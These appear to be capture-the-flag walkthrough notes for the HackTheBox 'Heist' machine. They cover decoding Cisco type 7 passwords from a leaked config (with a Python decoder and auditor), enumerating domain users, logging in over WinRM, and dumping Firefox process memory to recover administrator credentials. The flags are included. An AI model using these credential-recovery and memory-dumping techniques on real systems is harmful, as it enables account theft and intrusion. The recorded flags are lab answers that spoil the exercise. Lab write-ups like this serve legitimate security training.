10.10.10.149
### information gathering
```
Open 10.10.10.149:80
Open 10.10.10.149:135
Open 10.10.10.149:445
Open 10.10.10.149:5985
Open 10.10.10.149:49669
```
http://10.10.10.149/attachments/config.txt
![[Pasted image 20220115165636.png]]
Password hashes from config.txt:
```
rout3r : 0242114B0E143F015F5D1E161713
admin : 02375012182C1A1D751618034F36415408
secret : $1$pdQG$o8nrSzsGXeaduXrjlvKc91
```
![[Pasted image 20220115163102.png]]
![[Pasted image 20220115163052.png]]
### foothold
![[Pasted image 20220115163442.png]]
```
stealth1agent
```
https://packetlife.net/toolbox/type7/
![[Pasted image 20220115163843.png]]
![[Pasted image 20220115163912.png]]
```
rout3r : $uperP@ssword
admin : Q4)sJu\Y8qz*A3?d
```
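The type 7 strings from config.txt are reversible obfuscation rather than hashes, which is why the online tool returns the plaintext directly. The Python script below is an added example, not part of the original notes: it audits IOS-style credential lines and decodes any type 7 value it finds. The sample config lines are constructed from the values on this page, and `audit_config` and its severity labels are names chosen for this example.

```python
import re

# Fixed key IOS uses for type 7 obfuscation (publicly documented, same on every device).
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(encoded: str) -> str:
    """Type 7 = two decimal digits of key offset, then hex bytes XORed with XLAT."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a type 7 string")
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])  # raises ValueError on non-hex input
    plain = bytes(b ^ XLAT[(offset + i) % len(XLAT)] for i, b in enumerate(data))
    return plain.decode("ascii", "replace")

# "<subject> password|secret <type digit> <value>" as written in IOS configs.
CRED_RE = re.compile(
    r"^(?P<subject>.*?)\s*\b(?P<kind>password|secret)\s+(?P<type>\d)\s+(?P<value>\S+)$")

# Hypothetical severity labels for this example.
SEVERITY = {"0": "critical", "7": "critical", "5": "medium"}

def audit_config(text: str) -> list:
    """Return one finding per credential line; type 7 values are decoded to prove exposure."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CRED_RE.match(line.strip())
        if not m:
            continue
        ctype = m["type"]
        findings.append({
            "line": lineno, "subject": m["subject"], "type": ctype,
            "severity": SEVERITY.get(ctype, "review"),
            # Only type 7 is reversible; type 5 is salted MD5-crypt and must be guessed.
            "recovered": decode_type7(m["value"]) if ctype == "7" else None,
        })
    return findings

# Constructed sample lines using the credential values shown on this page.
SAMPLE_CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f)
```

Anything reported as type 7 should be treated as plaintext; on IOS versions that support them, type 8 or type 9 secrets replace it.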
![[Pasted image 20220115164723.png]]
```
Hazard : stealth1agent
Domain : SupportDesk
```
```
# get all users
impacket-lookupsid [email protected]
```
user-list
```
Hazard
support
Chase
Jason
```
![[Pasted image 20220115170338.png]]
```
Chase : Q4)sJu\Y8qz*A3?d -> can log in over WinRM
```
![[Pasted image 20220115170716.png]]
todo :
```
cmd.exe /c "SharpHound.exe -c all --domain htb"
cmd.exe /c "SharpHound.exe -c all --domain SupportDesk"
```
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\Chase\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'
```
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe
Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db
# dump the db to crack
Run SharpWeb (https://github.com/djhohnstein/SharpWeb)
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
C:\Windows\Panther\Unattend.xm
```
### privilege
To administrator: dump the running Firefox process with procdump64.exe, then search the dump with strings64.exe.
![[Pasted image 20220115181119.png]]
```
# find the Firefox PID (5008 here) with ps or Get-Process
Get-Process firefox
procdump64.exe -ma 5008 -accepteula
strings64.exe -accepteula firefox.exe_220115_155522.dmp > firefox.txt
```
![[Pasted image 20220115181525.png]]
```
admin : 4dD!5}x/re8]FBuZ
```
![[Pasted image 20220115181619.png]]
### beyond root
[Mimikittenz](https://github.com/putterpanda/mimikittenz)
https://0xdf.gitlab.io/2019/11/30/htb-heist.html
```
grep -aoE 'login_username=.{1,20}@.{1,20}&login_password=.{1,50}&login=' firefox.exe_190823_025430.dmp
```
### flags
```
user.txt : 46c7bb70691b10bc06c79c00a8ab579b
root.txt : 529c2e94d9646627d0080e4a696eb88e
```